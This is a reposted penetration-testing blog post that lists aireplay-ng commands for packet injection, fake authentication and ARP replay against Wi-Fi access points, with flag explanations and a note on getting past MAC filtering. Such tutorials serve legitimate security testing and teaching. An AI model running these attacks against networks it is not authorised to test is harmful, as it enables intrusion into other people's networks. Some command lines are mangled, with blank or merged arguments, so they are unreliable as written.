Wireless Attacks: Part I – Penetration Testing in Linux

Common Commands Used in Aircrack-ng

injection command
aireplay-ng -3 -b -h ath0
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:46:11:19 ath0
Fake Authentication Commands

aireplay-ng -1 0 -e -a -h ath0
aireplay-ng -1 0 -e linksys-a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
Or another variation for picky access points

aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

Arp Replay Attack

aireplay-ng -3 -b 00:13:10:30:24:9C mon0

Where:
-3 means standard arp request replay
-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
ath0 is the wireless interface name
Basic usage:
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Where:

-3 means standard arp request replay
-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
ath0 is the wireless interface name
There are two methods of replaying an ARP which was previously injected. The first and simplest method is to use the same

command plus the ”-r” to read the output file from your last successful ARP replay.

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0
Where:

-3 means standard arp request replay
-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
-r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
ath0 is the wireless interface name
The second method is a special case of the interactive packet replay attack. It is presented here since it is complementary to the ARP request replay attack.

aireplay-ng -2 -r replay_arp-0219-115508.cap ath0
Where:

-2 means interactive frame selection
-r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
ath0 is the wireless card interface name
“NOTE” Some access points are configured to only allow selected MAC access to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know
one of the MAC addresses on the allowed list.Thus, the advantage of the next technique (interactive replay) is that it gets around this control.

The post Wireless Attacks: Part I appeared first on Penetration Testing in Linux. http://ift.tt/2ps2EAE http://ift.tt/2aM8QhC

Anúncios

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s